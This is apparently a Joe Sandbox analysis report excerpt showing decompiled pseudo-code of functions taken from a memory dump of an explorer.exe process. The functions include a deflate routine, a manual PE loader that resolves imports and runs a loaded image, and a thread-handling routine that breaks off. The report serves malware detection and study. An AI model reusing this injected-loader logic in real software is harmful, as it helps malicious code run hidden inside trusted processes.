        • Opcode Fuzzy Hash: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
        • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
        Download Yara Rule
        C-Code - Quality: 99%
        			E000D2D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E000D5D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E000D4AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E000D4C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E000D4AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































        0x000d2d76
        0x000d2d7b
        0x000d2d7f
        0x000d2d82
        0x000d2d82
        0x000d2d85
        0x000d2d8a
        0x000d2d8f
        0x000d2d92
        0x000d2d97
        0x000d2d9a
        0x000d2da0
        0x000d2da0
        0x000d2dab
        0x000d2dae
        0x000d2db5
        0x000d2dba
        0x00000000
        0x00000000
        0x000d2dc0
        0x000d2dc5
        0x000d2dc5
        0x000d2dca
        0x000d2dd0
        0x000d2dda
        0x000d2ddf
        0x000d2de5
        0x000d2e04
        0x000d2e07
        0x000d2e12
        0x000d2e12
        0x000d2e12
        0x000d2e09
        0x000d2e09
        0x000d2e0b
        0x00000000
        0x000d2e0d
        0x000d2e0d
        0x000d2e0d
        0x000d2e0b
        0x000d2e1a
        0x000d2e1f
        0x000d2e24
        0x000d2e2a
        0x000d2e2e
        0x000d2e31
        0x000d2e34
        0x000d2e3a
        0x000d2e3f
        0x000d2e42
        0x000d2e48
        0x000d2e4d
        0x000d2e53
        0x000d2e59
        0x000d2e5e
        0x000d2e61
        0x000d2e66
        0x000d2e6a
        0x000d2e6e
        0x000d2e71
        0x000d2e74
        0x000d2e7d
        0x000d2e84
        0x000d2e87
        0x000d2e8a
        0x000d2e8f
        0x000d2e94
        0x000d2e97
        0x000d2e9a
        0x000d2e9a
        0x000d2e9e
        0x000d2ea7
        0x000d2eae
        0x000d2eb1
        0x000d2eb6
        0x000d2ebb
        0x000d2ebb
        0x000d2ebe
        0x000d2ec3
        0x00000000
        0x00000000
        0x000d2de7
        0x000d2de9
        0x000d2df6
        0x00000000
        0x00000000
        0x000d2df6
        0x000d2de9
        0x00000000
        0x000d2de5
        0x000d2ec9
        0x000d2ece
        0x000d2ed1
        0x000d2ed4
        0x000d2f7f
        0x000d2f7f
        0x000d2eda
        0x000d2eda
        0x000d2eda
        0x000d2edf
        0x000d2f09
        0x000d2f0c
        0x000d2f0c
        0x000d2f11
        0x000d2f13
        0x000d2f15
        0x000d2f18
        0x000d2f1b
        0x000d2f23
        0x000d2f28
        0x000d2f28
        0x000d2f2e
        0x000d2f31
        0x000d2f34
        0x000d2f37
        0x000d2f39
        0x000d2f39
        0x000d2f3a
        0x000d2f3a
        0x000d2f37
        0x000d2f48
        0x000d2f4b
        0x000d2f4f
        0x000d2f54
        0x000d2f57
        0x000d2f5a
        0x000d2f5a
        0x000d2f5a
        0x000d2f5d
        0x000d2f5d
        0x000d2f60
        0x000d2f60
        0x000d2ee1
        0x000d2ee1
        0x000d2ef1
        0x000d2ef4
        0x000d2ef9
        0x000d2ef9
        0x000d2efc
        0x000d2eff
        0x000d2f02
        0x000d2f04
        0x000d2f04
        0x000d2f63
        0x000d2f65
        0x000d2f68
        0x000d2f68
        0x000d2f6e
        0x000d2f72
        0x000d2f75
        0x000d2f77
        0x000d2f77
        0x000d2f88
        0x000d2f8a
        0x000d2f8a
        0x000d2f92
        0x000d2fa0
        0x000d2fa3
        0x000d2fa5
        0x000d2fc5
        0x000d2fc5
        0x000d2fc8
        0x000d2fce
        0x000d2fcf
        0x000d2fd2
        0x000d2fd4
        0x000d2fd7
        0x000d2fda
        0x000d2fdd
        0x000d2fe1
        0x000d2fe4
        0x000d2fe7
        0x000d2fea
        0x000d2fec
        0x000d2fec
        0x000d2fef
        0x000d2ff1
        0x000d2ff1
        0x000d2ff4
        0x000d2ff6
        0x000d2ff9
        0x000d3001
        0x000d3004
        0x000d3009
        0x000d3009
        0x000d300f
        0x000d3012
        0x000d3015
        0x000d3017
        0x000d3017
        0x000d3018
        0x000d3018
        0x000d3023
        0x000d3023
        0x000d3023
        0x000d3026
        0x000d3029
        0x000d3029
        0x000d302c
        0x000d302c
        0x000d2fef
        0x000d302f
        0x000d3032
        0x000d3035
        0x000d3037
        0x000d303a
        0x000d303c
        0x000d303f
        0x000d3042
        0x000d3044
        0x000d3047
        0x000d304f
        0x000d3057
        0x000d305a
        0x000d305a
        0x000d305a
        0x000d305d
        0x000d305d
        0x000d305d
        0x000d3060
        0x000d3066
        0x000d3068
        0x000d3068
        0x000d306e
        0x000d3074
        0x000d307d
        0x000d3084
        0x000d3086
        0x000d3089
        0x000d3089
        0x000d308c
        0x000d308c
        0x000d308f
        0x000d3091
        0x000d3094
        0x000d3096
        0x000d30b1
        0x000d30b1
        0x000d30b5
        0x000d30b8
        0x000d30bb
        0x000d30be
        0x000d30d4
        0x000d30d4
        0x000d30d4
        0x000d30c0
        0x000d30c0
        0x000d30c2
        0x000d30c6
        0x000d30c9
        0x00000000
        0x000d30cb
        0x000d30cb
        0x000d30cd
        0x00000000
        0x000d30cf
        0x000d30cf
        0x000d30cf
        0x000d30cd
        0x000d30c9
        0x000d30d8
        0x000d30db
        0x000d30e0
        0x000d30ea
        0x000d30ea
        0x000d30ea
        0x000d30ed
        0x000d3098
        0x000d3098
        0x000d309a
        0x000d30a1
        0x000d30a1
        0x000d30a3
        0x000d30a5
        0x000d30a7
        0x000d30ab
        0x000d30ad
        0x000d30af
        0x00000000
        0x00000000
        0x000d30af
        0x000d30ab
        0x000d309c
        0x000d309c
        0x000d309f
        0x00000000
        0x00000000
        0x000d309f
        0x000d309a
        0x000d30f7
        0x000d30f9
        0x000d30f9
        0x000d3104
        0x000d2fa7
        0x000d2fa7
        0x000d2faa
        0x00000000
        0x000d2fac
        0x000d2fac
        0x000d2fae
        0x000d2fb2
        0x00000000
        0x000d2fb4
        0x000d2fb4
        0x000d2fb4
        0x000d2fb7
        0x00000000
        0x000d2fbb
        0x000d2fc4
        0x000d2fc4
        0x000d2fb7
        0x000d2fb2
        0x000d2faa
        0x000d2f96
        0x000d2f9f
        0x000d2f9f

        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 52%
        			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























        0x000d2afb
        0x000d2b01
        0x000d2b0a
        0x000d2b0d
        0x000d2b10
        0x00000000
        0x000d2c01
        0x000d2c05
        0x000d2c07
        0x000d2c15
        0x000d2d33
        0x000d2d3c
        0x000d2d3f
        0x000d2d43
        0x000d2d49
        0x000d2d51
        0x000d2d51
        0x000d2d59
        0x00000000
        0x000d2d64
        0x000d2c1b
        0x000d2c24
        0x000d2c32
        0x000d2c35
        0x000d2c52
        0x000d2c59
        0x000d2c6b
        0x000d2c6b
        0x000d2c72
        0x000d2c82
        0x000d2c9a
        0x000d2c84
        0x000d2c8c
        0x000d2c8c
        0x000d2c9d
        0x000d2ca1
        0x000d2cb1
        0x000d2cd4
        0x000d2ce6
        0x000d2cb3
        0x000d2cc7
        0x000d2cc7
        0x000d2cf0
        0x000d2d0c
        0x000d2cf2
        0x000d2d01
        0x000d2d01
        0x000d2d14
        0x000d2d1d
        0x000d2d1d
        0x000d2d2b
        0x00000000
        0x000d2c74
        0x000d2c76
        0x00000000
        0x000d2c76
        0x000d2c72
        0x00000000
        0x000d2c35
        0x000d2b18
        0x000d2b26
        0x000d2b2b
        0x000d2b36
        0x000d2b39
        0x000d2b3d
        0x000d2b3f
        0x000d2b4f
        0x000d2b58
        0x000d2b61
        0x000d2b69
        0x000d2b72
        0x000d2b7d
        0x000d2b83
        0x000d2b86
        0x000d2b89
        0x000d2b90
        0x000d2b97
        0x00000000
        0x00000000
        0x000d2ba2
        0x000d2bb0
        0x000d2bbb
        0x000d2bc5
        0x000d2bdd
        0x000d2bea
        0x000d2bea
        0x000d2bc7
        0x000d2bd2
        0x000d2bd2
        0x000d2bf1
        0x000d2bf1
        0x000d2bf9
        0x000d2bf9
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
        • LoadLibraryA.KERNEL32(?), ref: 000D2C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
        • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C1C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xde6dc; // 0x1d8
				_t13 = E000CA4BF(_t41, 0);
				while(_t13 < 0) {
					E000C980C( &_v28);
					_t43 =  *0xde6e0; // 0x0
					_t15 =  *0xde6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xde684; // 0x64f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xde6dc; // 0x1d8
						__eflags = 0;
						_t13 = E000CA4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xde6e8; // 0x64ffd0
				_v28 = _t20;
				_t22 = E000CA6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
					E000C980C(0xde6e0);
					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xde760);
						_t51 = 0x27;
						E000C9F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
				_t48 =  *0xde6dc; // 0x1d8
				 *0xde6d0 = 0;
				E000CA4DB(_t48);
				E000C861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























        0x000c1c68
        0x000c1c75
        0x000c1c77
        0x000c1c7e
        0x000c1ce4
        0x000c1c8b
        0x000c1c90
        0x000c1c96
        0x000c1c9b
        0x000c1ca1
        0x000c1ca3
        0x000c1ca7
        0x000c1d15
        0x000c1d17
        0x000c1d99
        0x000c1d9f
        0x000c1d9f
        0x000c1ca9
        0x000c1cb1
        0x000c1cb1
        0x000c1cbd
        0x000c1cc3
        0x000c1cc5
        0x00000000
        0x00000000
        0x000c1cc7
        0x000c1cd1
        0x000c1cd7
        0x000c1cdd
        0x000c1cdf
        0x00000000
        0x000c1cdf
        0x000c1cab
        0x000c1caf
        0x00000000
        0x00000000
        0x00000000
        0x000c1caf
        0x000c1cee
        0x000c1cef
        0x000c1cf0
        0x000c1cf1
        0x000c1cf2
        0x000c1cf7
        0x000c1d01
        0x000c1d06
        0x000c1d0e
        0x000c1d29
        0x000c1d2c
        0x000c1d36
        0x000c1d41
        0x000c1d54
        0x000c1d56
        0x000c1d58
        0x000c1d5a
        0x000c1d5b
        0x000c1d63
        0x000c1d64
        0x000c1d6a
        0x000c1d10
        0x000c1d10
        0x000c1d10
        0x000c1d6b
        0x000c1d76
        0x000c1d79
        0x000c1d7f
        0x000c1d85
        0x000c1d90
        0x000c1d97
        0x00000000

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
        • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
        • Opcode Fuzzy Hash: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
        • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C1B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E000C1B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
